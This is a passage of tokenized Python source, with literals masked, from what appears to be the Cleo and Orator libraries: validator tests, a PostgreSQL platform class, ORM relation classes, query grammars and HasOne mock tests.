'<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> self . 
assertEqual ( '<STR_LIT:foo>' , validator . validate ( '<STR_LIT:foo>' ) ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , validator . validate ( '<STR_LIT:bar>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , validator . validate ( '<STR_LIT>' ) ) <EOL> try : <EOL> validator . validate ( '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except ValidationError as e : <EOL> self . assertRegex ( <EOL> str ( e ) , <EOL> '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( map ( repr , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) ) <EOL> ) <EOL> class ChoiceTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Choice ( [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , validator . validate ( '<STR_LIT:foo>' ) ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , validator . validate ( '<STR_LIT:bar>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , validator . validate ( '<STR_LIT>' ) ) <EOL> try : <EOL> validator . validate ( '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except ValidationError as e : <EOL> self . assertRegex ( <EOL> str ( e ) , <EOL> '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( map ( repr , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) ) <EOL> ) <EOL> class CallableTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Callable ( int ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> class IntegerTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Integer ( ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . 
validate , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> class FloatTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Float ( ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> class RangeTestCase ( CleoTestCase ) : <EOL> def test_validate_with_includes ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:11> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> self . assertEqual ( <NUM_LIT:12> , validator . validate ( <NUM_LIT:12> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> def test_validate_without_includes ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , False , False ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:11> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:12> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . 
validate ( <NUM_LIT:15> ) ) <EOL> def test_validate_with_invalid_type ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , validator = Integer ( ) ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> def test_validate_with_type ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , validator = Float ( ) ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> def test_validate_with_string ( self ) : <EOL> validator = Range ( '<STR_LIT:c>' , '<STR_LIT:h>' , validator = None ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:a>' <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:i>' <EOL> ) <EOL> self . assertEqual ( '<STR_LIT:d>' , validator . validate ( '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( '<STR_LIT:h>' , validator . validate ( '<STR_LIT:h>' ) ) <EOL> self . assertEqual ( '<STR_LIT:c>' , validator . validate ( '<STR_LIT:c>' ) ) </s>
<s> class ConnectionResolverInterface ( object ) : <EOL> def connection ( self , name = None ) : <EOL> raise NotImplementedError ( ) <EOL> def get_default_connection ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def set_default_connection ( self , name ) : <EOL> raise NotImplementedError ( ) </s>
<s> from . platform import Platform <EOL> from . keywords . postgresql_keywords import PostgreSQLKeywords <EOL> from . . table import Table <EOL> from . . column import Column <EOL> from . . identifier import Identifier <EOL> class PostgresPlatform ( Platform ) : <EOL> INTERNAL_TYPE_MAPPING = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:int>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:bool>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT:text>' , <EOL> '<STR_LIT>' : '<STR_LIT:text>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:date>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:time>' : '<STR_LIT:time>' , <EOL> '<STR_LIT>' : '<STR_LIT:time>' , <EOL> '<STR_LIT:float>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def get_list_table_columns_sql ( self , table ) : <EOL> sql = """<STR_LIT>""" % self . 
get_table_where_clause ( table ) <EOL> return sql <EOL> def get_list_table_indexes_sql ( self , table ) : <EOL> sql = """<STR_LIT>""" <EOL> sql = sql % self . get_table_where_clause ( table , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return sql <EOL> def get_list_table_foreign_keys_sql ( self , table ) : <EOL> return '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:(>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' + self . get_table_where_clause ( table ) + '<STR_LIT>' '<STR_LIT:)>' '<STR_LIT>' <EOL> def get_table_where_clause ( self , table , class_alias = '<STR_LIT:c>' , namespace_alias = '<STR_LIT:n>' ) : <EOL> where_clause = namespace_alias + '<STR_LIT>' <EOL> if table . find ( '<STR_LIT:.>' ) >= <NUM_LIT:0> : <EOL> split = table . split ( '<STR_LIT:.>' ) <EOL> schema , table = split [ <NUM_LIT:0> ] , split [ <NUM_LIT:1> ] <EOL> schema = "<STR_LIT>" % schema <EOL> else : <EOL> schema = '<STR_LIT>' '<STR_LIT>' <EOL> where_clause += '<STR_LIT>' % ( class_alias , table , namespace_alias , schema ) <EOL> return where_clause <EOL> def get_advanced_foreign_key_options_sql ( self , foreign_key ) : <EOL> query = '<STR_LIT>' <EOL> if foreign_key . has_option ( '<STR_LIT>' ) : <EOL> query += '<STR_LIT>' % foreign_key . get_option ( '<STR_LIT>' ) <EOL> query += super ( PostgresPlatform , self ) . get_advanced_foreign_key_options_sql ( foreign_key ) <EOL> deferrable = foreign_key . has_option ( '<STR_LIT>' ) and foreign_key . get_option ( '<STR_LIT>' ) is not False <EOL> if deferrable : <EOL> query += '<STR_LIT>' <EOL> else : <EOL> query += '<STR_LIT>' <EOL> query += '<STR_LIT>' <EOL> deferred = foreign_key . has_option ( '<STR_LIT>' ) and foreign_key . get_option ( '<STR_LIT>' ) is not False <EOL> if deferred : <EOL> query += '<STR_LIT>' <EOL> else : <EOL> query += '<STR_LIT>' <EOL> return query <EOL> def get_alter_table_sql ( self , diff ) : <EOL> """<STR_LIT>""" <EOL> sql = [ ] <EOL> for column_diff in diff . changed_columns . values ( ) : <EOL> if self . 
is_unchanged_binary_column ( column_diff ) : <EOL> continue <EOL> old_column_name = column_diff . get_old_column_name ( ) . get_quoted_name ( self ) <EOL> column = column_diff . column <EOL> if any ( [ column_diff . has_changed ( '<STR_LIT:type>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) ] ) : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + self . get_sql_type_declaration ( column . to_dict ( ) ) <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT:default>' ) or column_diff . has_changed ( '<STR_LIT:type>' ) : <EOL> if column . get_default ( ) is None : <EOL> default_clause = '<STR_LIT>' <EOL> else : <EOL> default_clause = '<STR_LIT>' + self . get_default_value_declaration_sql ( column . to_dict ( ) ) <EOL> query = '<STR_LIT>' + old_column_name + default_clause <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' <EOL> if column . get_notnull ( ) : <EOL> op = '<STR_LIT>' <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT:U+0020>' + op + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> if column . get_autoincrement ( ) : <EOL> seq_name = self . get_identity_sequence_name ( diff . name , old_column_name ) <EOL> sql . append ( '<STR_LIT>' + seq_name ) <EOL> sql . append ( '<STR_LIT>' + seq_name + '<STR_LIT>' <EOL> '<STR_LIT>' + old_column_name + '<STR_LIT>' + diff . name + '<STR_LIT>' ) <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + seq_name + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . 
get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> else : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + self . get_sql_type_declaration ( column . to_dict ( ) ) <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> for old_column_name , column in diff . renamed_columns . items ( ) : <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' <EOL> '<STR_LIT>' + Identifier ( old_column_name ) . get_quoted_name ( self ) + <EOL> '<STR_LIT>' + column . get_quoted_name ( self ) ) <EOL> return sql <EOL> def is_unchanged_binary_column ( self , column_diff ) : <EOL> column_type = column_diff . column . get_type ( ) <EOL> if column_type not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return False <EOL> if isinstance ( column_diff . from_column , Column ) : <EOL> from_column = column_diff . from_column <EOL> else : <EOL> from_column = None <EOL> if from_column : <EOL> from_column_type = self . INTERNAL_TYPE_MAPPING [ from_column . get_type ( ) ] <EOL> if from_column_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return False <EOL> return len ( [ x for x in column_diff . changed_properties if x not in [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' ] ] ) == <NUM_LIT:0> <EOL> if column_diff . has_changed ( '<STR_LIT:type>' ) : <EOL> return False <EOL> return len ( [ x for x in column_diff . changed_properties if x not in [ '<STR_LIT>' , '<STR_LIT>' ] ] ) == <NUM_LIT:0> <EOL> def convert_booleans ( self , item ) : <EOL> if isinstance ( item , list ) : <EOL> for i , value in enumerate ( item ) : <EOL> if isinstance ( value , bool ) : <EOL> item [ i ] = str ( value ) . 
lower ( ) <EOL> elif isinstance ( item , bool ) : <EOL> item = str ( item ) . lower ( ) <EOL> return item <EOL> def get_boolean_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_integer_type_declaration_sql ( self , column ) : <EOL> if column . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_bigint_type_declaration_sql ( self , column ) : <EOL> if column . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_smallint_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_guid_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_datetime_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_datetimetz_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_date_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_time_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_string_type_declaration_sql ( self , column ) : <EOL> length = column . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fixed = column . 
get ( '<STR_LIT>' ) <EOL> if fixed : <EOL> return '<STR_LIT>' % length <EOL> else : <EOL> return '<STR_LIT>' % length <EOL> def get_binary_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_blob_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_clob_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_text_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_json_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_decimal_type_declaration_sql ( self , column ) : <EOL> if '<STR_LIT>' not in column or not column [ '<STR_LIT>' ] : <EOL> column [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> if '<STR_LIT>' not in column or not column [ '<STR_LIT>' ] : <EOL> column [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return '<STR_LIT>' % ( column [ '<STR_LIT>' ] , column [ '<STR_LIT>' ] ) <EOL> def get_float_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def supports_foreign_key_constraints ( self ) : <EOL> return True <EOL> def _get_reserved_keywords_class ( self ) : <EOL> return PostgreSQLKeywords </s>
<s> from ... query . expression import QueryExpression <EOL> from . relation import Relation <EOL> from . result import Result <EOL> class BelongsTo ( Relation ) : <EOL> def __init__ ( self , query , parent , foreign_key , other_key , relation ) : <EOL> """<STR_LIT>""" <EOL> self . _other_key = other_key <EOL> self . _relation = relation <EOL> self . _foreign_key = foreign_key <EOL> super ( BelongsTo , self ) . __init__ ( query , parent ) <EOL> def get_results ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _query . first ( ) <EOL> def add_constraints ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _constraints : <EOL> table = self . _related . get_table ( ) <EOL> self . _query . where ( '<STR_LIT>' % ( table , self . _other_key ) , '<STR_LIT:=>' , getattr ( self . _parent , self . _foreign_key ) ) <EOL> def get_relation_count_query ( self , query , parent ) : <EOL> """<STR_LIT>""" <EOL> query . select ( QueryExpression ( '<STR_LIT>' ) ) <EOL> other_key = self . wrap ( '<STR_LIT>' % ( query . get_model ( ) . get_table ( ) , self . _other_key ) ) <EOL> return query . where ( self . get_qualified_foreign_key ( ) , '<STR_LIT:=>' , QueryExpression ( other_key ) ) <EOL> def add_eager_constraints ( self , models ) : <EOL> """<STR_LIT>""" <EOL> key = '<STR_LIT>' % ( self . _related . get_table ( ) , self . _other_key ) <EOL> self . _query . where_in ( key , self . _get_eager_model_keys ( models ) ) <EOL> def _get_eager_model_keys ( self , models ) : <EOL> """<STR_LIT>""" <EOL> keys = [ ] <EOL> for model in models : <EOL> value = getattr ( model , self . _foreign_key ) <EOL> if value is not None and value not in keys : <EOL> keys . append ( value ) <EOL> if not len ( keys ) : <EOL> return [ <NUM_LIT:0> ] <EOL> return keys <EOL> def init_relation ( self , models , relation ) : <EOL> """<STR_LIT>""" <EOL> for model in models : <EOL> model . 
set_relation ( relation , Result ( None , self , model ) ) <EOL> return models <EOL> def match ( self , models , results , relation ) : <EOL> """<STR_LIT>""" <EOL> foreign = self . _foreign_key <EOL> other = self . _other_key <EOL> dictionary = { } <EOL> for result in results : <EOL> dictionary [ result . get_attribute ( other ) ] = result <EOL> for model in models : <EOL> value = getattr ( model , foreign ) <EOL> if value in dictionary : <EOL> results = Result ( dictionary [ value ] , self , model ) <EOL> else : <EOL> results = Result ( None , self , model ) <EOL> model . set_relation ( relation , results ) <EOL> return models <EOL> def associate ( self , model ) : <EOL> """<STR_LIT>""" <EOL> self . _parent . set_attribute ( self . _foreign_key , model . get_attribute ( self . _other_key ) ) <EOL> return self . _parent . set_relation ( self . _relation , Result ( model , self , self . _parent ) ) <EOL> def dissociate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _parent . set_attribute ( self . _foreign_key , None ) <EOL> return self . _parent . set_relation ( self . _relation , Result ( None , self , self . _parent ) ) <EOL> def update ( self , _attributes = None , ** attributes ) : <EOL> """<STR_LIT>""" <EOL> if _attributes is not None : <EOL> attributes . update ( _attributes ) <EOL> instance = self . get_results ( ) <EOL> return instance . fill ( attributes ) . save ( ) <EOL> def get_foreign_key ( self ) : <EOL> return self . _foreign_key <EOL> def get_qualified_foreign_key ( self ) : <EOL> return '<STR_LIT>' % ( self . _parent . get_table ( ) , self . _foreign_key ) <EOL> def get_other_key ( self ) : <EOL> return self . _other_key <EOL> def get_qualified_other_key_name ( self ) : <EOL> return '<STR_LIT>' % ( self . _related . get_table ( ) , self . _other_key ) <EOL> def _new_instance ( self , model ) : <EOL> return BelongsTo ( <EOL> self . new_query ( ) , <EOL> model , <EOL> self . _foreign_key , <EOL> self . _other_key , <EOL> self . _relation <EOL> ) </s>
<s> from . grammar import QueryGrammar <EOL> from . postgres_grammar import PostgresQueryGrammar <EOL> from . mysql_grammar import MySQLQueryGrammar <EOL> from . sqlite_grammar import SQLiteQueryGrammar </s>
<s> from . . query . expression import QueryExpression <EOL> class Grammar ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _table_prefix = '<STR_LIT>' <EOL> def wrap_list ( self , values ) : <EOL> return map ( self . wrap , values ) <EOL> def wrap_table ( self , table ) : <EOL> if self . is_expression ( table ) : <EOL> return self . get_value ( table ) <EOL> return self . wrap ( self . _table_prefix + str ( table ) , True ) <EOL> def wrap ( self , value , prefix_alias = False ) : <EOL> if self . is_expression ( value ) : <EOL> return self . get_value ( value ) <EOL> if value . lower ( ) . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> segments = value . split ( '<STR_LIT:U+0020>' ) <EOL> if prefix_alias : <EOL> segments [ <NUM_LIT:2> ] = self . _table_prefix + segments [ <NUM_LIT:2> ] <EOL> return '<STR_LIT>' % ( self . wrap ( segments [ <NUM_LIT:0> ] ) , <EOL> self . _wrap_value ( segments [ <NUM_LIT:2> ] ) ) <EOL> wrapped = [ ] <EOL> segments = value . split ( '<STR_LIT:.>' ) <EOL> for key , segment in enumerate ( segments ) : <EOL> if key == <NUM_LIT:0> and len ( segments ) > <NUM_LIT:1> : <EOL> wrapped . append ( self . wrap_table ( segment ) ) <EOL> else : <EOL> wrapped . append ( self . _wrap_value ( segment ) ) <EOL> return '<STR_LIT:.>' . join ( wrapped ) <EOL> def _wrap_value ( self , value ) : <EOL> if value == '<STR_LIT:*>' : <EOL> return value <EOL> return '<STR_LIT>' % value . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> def columnize ( self , columns ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( map ( self . wrap , columns ) ) <EOL> def parameterize ( self , values ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( map ( self . parameter , values ) ) <EOL> def parameter ( self , value ) : <EOL> if self . is_expression ( value ) : <EOL> return self . get_value ( value ) <EOL> return self . get_marker ( ) <EOL> def get_value ( self , expression ) : <EOL> return expression . 
get_value ( ) <EOL> def is_expression ( self , value ) : <EOL> return isinstance ( value , QueryExpression ) <EOL> def get_date_format ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_table_prefix ( self ) : <EOL> return self . _table_prefix <EOL> def set_table_prefix ( self , prefix ) : <EOL> self . _table_prefix = prefix <EOL> return self <EOL> def get_marker ( self ) : <EOL> return '<STR_LIT:?>' </s>
<s> import arrow <EOL> from flexmock import flexmock , flexmock_teardown <EOL> from ... import OratorTestCase <EOL> from orator . query . builder import QueryBuilder <EOL> from orator . query . grammars import QueryGrammar <EOL> from orator . query . expression import QueryExpression <EOL> from orator . orm . builder import Builder <EOL> from orator . orm . model import Model <EOL> from orator . orm . relations import HasOne <EOL> from orator . orm . collection import Collection <EOL> class OrmHasOneTestCase ( OratorTestCase ) : <EOL> def tearDown ( self ) : <EOL> flexmock_teardown ( ) <EOL> def test_save_method_set_foreign_key_on_model ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> mock_model = flexmock ( Model ( ) , save = lambda : True ) <EOL> mock_model . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> result = relation . save ( mock_model ) <EOL> attributes = result . get_attributes ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , attributes [ '<STR_LIT>' ] ) <EOL> def test_create_properly_creates_new_model ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> created = flexmock ( Model ( ) , save = lambda : True , set_attribute = lambda : None ) <EOL> created . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( { '<STR_LIT:name>' : '<STR_LIT>' } ) . and_return ( created ) <EOL> created . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( created , relation . create ( name = '<STR_LIT>' ) ) <EOL> def test_update_updates_models_with_timestamps ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> now = arrow . get ( ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( now ) <EOL> relation . get_query ( ) . 
should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : now } ) . and_return ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , relation . update ( foo = '<STR_LIT:bar>' ) ) <EOL> def test_relation_is_properly_initialized ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> model = flexmock ( Model ( ) ) <EOL> model . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT:foo>' , None ) <EOL> models = relation . init_relation ( [ model ] , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( [ model ] , models ) <EOL> def test_eager_constraints_are_properly_added ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> relation . get_query ( ) . get_query ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> model1 = OrmHasOneModelStub ( ) <EOL> model1 . id = <NUM_LIT:1> <EOL> model2 = OrmHasOneModelStub ( ) <EOL> model2 . id = <NUM_LIT:2> <EOL> relation . add_eager_constraints ( [ model1 , model2 ] ) <EOL> def test_models_are_properly_matched_to_parents ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> result1 = OrmHasOneModelStub ( ) <EOL> result1 . foreign_key = <NUM_LIT:1> <EOL> result2 = OrmHasOneModelStub ( ) <EOL> result2 . foreign_key = <NUM_LIT:2> <EOL> model1 = OrmHasOneModelStub ( ) <EOL> model1 . id = <NUM_LIT:1> <EOL> model2 = OrmHasOneModelStub ( ) <EOL> model2 . id = <NUM_LIT:2> <EOL> model3 = OrmHasOneModelStub ( ) <EOL> model3 . id = <NUM_LIT:3> <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:2> ) <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:3> ) <EOL> models = relation . match ( [ model1 , model2 , model3 ] , Collection ( [ result1 , result2 ] ) , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , models [ <NUM_LIT:0> ] . foo . foreign_key ) <EOL> self . 
assertEqual ( <NUM_LIT:2> , models [ <NUM_LIT:1> ] . foo . foreign_key ) <EOL> self . assertEqual ( None , models [ <NUM_LIT:2> ] . foo ) <EOL> def test_relation_count_query_can_be_built ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> query = flexmock ( QueryBuilder ( None , QueryGrammar ( ) , None ) ) <EOL> builder = Builder ( query ) <EOL> builder . get_query ( ) . should_receive ( '<STR_LIT>' ) . once ( ) <EOL> relation . get_parent ( ) . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> builder . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , QueryExpression ) <EOL> parent_query = flexmock ( QueryBuilder ( None , None , None ) ) <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . and_return ( parent_query ) <EOL> grammar = flexmock ( ) <EOL> parent_query . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( grammar ) <EOL> grammar . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' ) <EOL> relation . get_relation_count_query ( builder , builder ) <EOL> def _get_relation ( self ) : <EOL> flexmock ( Builder ) <EOL> query = flexmock ( QueryBuilder ( None , QueryGrammar ( ) , None ) ) <EOL> builder = Builder ( query ) <EOL> builder . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> related = flexmock ( Model ( ) ) <EOL> related_query = QueryBuilder ( None , QueryGrammar ( ) , None ) <EOL> related . should_receive ( '<STR_LIT>' ) . and_return ( Builder ( related_query ) ) <EOL> builder . should_receive ( '<STR_LIT>' ) . and_return ( related ) <EOL> parent = flexmock ( Model ( ) ) <EOL> parent . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT:id>' ) . and_return ( <NUM_LIT:1> ) <EOL> parent . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> parent . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> parent . should_receive ( '<STR_LIT>' ) . 
